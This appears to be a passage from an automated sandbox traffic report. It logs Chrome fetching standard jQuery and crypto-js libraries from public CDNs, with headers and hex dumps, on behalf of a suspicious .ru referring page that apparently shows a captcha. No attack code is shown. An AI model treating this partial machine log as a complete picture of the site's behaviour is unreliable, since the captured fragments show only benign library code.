                                                                                                                                                                                                                                            2025-01-10 12:36:33 UTC1369INData Raw: 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 6a 46 79 5a 57 30 37 66 51 30 4b 49 30 74 77 62 45 35 6b 62 45 5a 47 64 57 4d 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70 62 32 34 36 49 48 4a 6c 62 47 46 30 61 58 5a 6c 4f 33 52 76 63 44 6f 67 4f 54 42 77 65 44 73 76 4b 6e 64 70 5a 48 52 6f 4f 69 41 78 4d 44 41 6c 4f 79 6f 76 63 47 46 6b 5a 47 6c 75 5a 79 31 79 61 57 64 6f 64 44 6f 67 64 6d 46 79 4b 43 30 74 59 6e 4d 74 5a 33 56 30 64 47 56 79 4c 58 67 73 49 43 34 33 4e 58 4a 6c 62 53 6b 37 63 47 46 6b 5a 47 6c 75 5a 79 31 73 5a 57 5a 30 4f 69 42 32 59 58 49 6f 4c 53 31 69 63 79 31 6e 64 58 52 30 5a 58 49 74 65 43 77 67 4c 6a 63 31 63 6d 56 74 4b 54 74 74 59
                                                                                                                                                                                                                                            Data Ascii: dpbi10b3A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI0twbE5kbEZGdWMuY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogOTBweDsvKndpZHRoOiAxMDAlOyovcGFkZGluZy1yaWdodDogdmFyKC0tYnMtZ3V0dGVyLXgsIC43NXJlbSk7cGFkZGluZy1sZWZ0OiB2YXIoLS1icy1ndXR0ZXIteCwgLjc1cmVtKTttY


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            114192.168.2.1749833151.101.130.1374435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:34 UTC622OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                                                                                                                                                                            Host: code.jquery.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                                                            Referer: https://dm9h.zomivane.ru/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:34 UTC611INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Content-Length: 89501
                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                            Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                                                                                                                                            ETag: "28feccc0-15d9d"
                                                                                                                                                                                                                                            Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                            Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            Age: 1997121
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:34 GMT
                                                                                                                                                                                                                                            X-Served-By: cache-lga21931-LGA, cache-nyc-kteb1890050-NYC
                                                                                                                                                                                                                                            X-Cache: HIT, HIT
                                                                                                                                                                                                                                            X-Cache-Hits: 55, 0
                                                                                                                                                                                                                                            X-Timer: S1736512594.468935,VS0,VE1
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            2025-01-10 12:36:34 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                                                                                                                                                            Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                                                                                                                                                            2025-01-10 12:36:34 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                                                                                                                                                                                            Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                                                                                                                                                                                                            2025-01-10 12:36:34 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                                                                                                                                                                                            Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                                                                                                                                                                                            2025-01-10 12:36:34 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                                                                                                                                                                                            Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                                                                                                                                                                                                            2025-01-10 12:36:34 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                                                                                                                                                                                                            Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                                                                                                                                                                                                            2025-01-10 12:36:34 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                                                                                                                                                                                                            Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                                                                                                                                                                                                            2025-01-10 12:36:34 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                                                                                                                                                                                                            Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                                                                                                                                                                                                            2025-01-10 12:36:34 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                                                                                                                                                                                                            Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                                                                                                                                                                                                            2025-01-10 12:36:34 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                                                                                                                                                                                                            Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                                                                                                                                                                                                            2025-01-10 12:36:34 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                                                                                                                                                                                                            Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            115192.168.2.1749834104.17.24.144435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:34 UTC650OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                                                                                                                                                                                                            Host: cdnjs.cloudflare.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                                                            Referer: https://dm9h.zomivane.ru/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:34 UTC958INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:34 GMT
                                                                                                                                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                            Cache-Control: public, max-age=30672000
                                                                                                                                                                                                                                            ETag: W/"61182885-40eb"
                                                                                                                                                                                                                                            Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                                                                                                                                                                                                            cf-cdnjs-via: cfworker/kv
                                                                                                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                            Age: 170405
                                                                                                                                                                                                                                            Expires: Wed, 31 Dec 2025 12:36:34 GMT
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=toAb%2FGVhQfXoIVXNeiyBqiJqzGN9dDvgRjn4Pf1tN1%2Fskm9XhPIJD9a3nwFajHYFsfRV6UlIRFjFxMCzwfVvWOL9qW3KzDW1HNDU48bY%2F88P6mQgclNL9LDXdIJmVSNoXnYJEZcU"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=15780000
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb6a389694400-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            2025-01-10 12:36:34 UTC411INData Raw: 37 62 65 62 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                                                                                                                                                                                                            Data Ascii: 7beb!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                                                                                                                                                                                                            2025-01-10 12:36:34 UTC1369INData Raw: 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 63 72 65 61
                                                                                                                                                                                                                                            Data Ascii: globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.crea
                                                                                                                                                                                                                                            2025-01-10 12:36:34 UTC1369INData Raw: 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42 79 74 65 73 29
                                                                                                                                                                                                                                            Data Ascii: all(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes)
                                                                                                                                                                                                                                            2025-01-10 12:36:34 UTC1369INData Raw: 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b 61 3c 63 3b
